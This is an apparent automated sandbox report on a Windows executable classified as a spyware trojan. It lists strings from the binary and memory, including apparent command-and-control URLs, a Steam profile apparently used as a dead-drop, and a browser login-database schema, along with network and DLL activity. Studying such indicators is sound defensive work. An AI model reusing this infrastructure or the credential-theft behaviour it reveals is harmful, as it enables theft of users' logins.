Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.stfc3
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1530034448.00000000009FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/C
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/Uf
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/api
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apickc6
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apivZ
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/pi
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/q6_e
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/api
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apil
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apin.txtPK
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steamp&c
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacebudi.lat:443/apigl
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rapeflowwj.lat:443/api
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/7656119972433190066U
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.ste
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steamp
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampow
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscri
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.comm
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sustainskelet.lat:443/api
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sweepyribs.lat:443/api%l
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcVcc
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: 0gnHF2twcT.exe, 00000000.00000003.1603777248.0000000005280000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49714 version: TLS 1.2

System Summary

Source: 0gnHF2twcT.exe Static PE information: section name:
Source: 0gnHF2twcT.exe Static PE information: section name: .idata
Source: 0gnHF2twcT.exe Static PE information: section name:
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A389B0 0_3_00A389B0
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A5C200 0_3_00A5C200
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A3DB28 0_3_00A3DB28
Source: 0gnHF2twcT.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0gnHF2twcT.exe Static PE information: Section: ZLIB complexity 0.9973980629280822
Source: 0gnHF2twcT.exe Static PE information: Section: mimqpfga ZLIB complexity 0.9946124506039368
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 0gnHF2twcT.exe, 00000000.00000003.1557213361.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1557098653.0000000005201000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1578229101.000000000527C000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1578012510.00000000051EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 0gnHF2twcT.exe ReversingLabs: Detection: 57%
Source: 0gnHF2twcT.exe Virustotal: Detection: 54%
Source: 0gnHF2twcT.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File read: C:\Users\user\Desktop\0gnHF2twcT.exe
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: mskeyprotect.dll
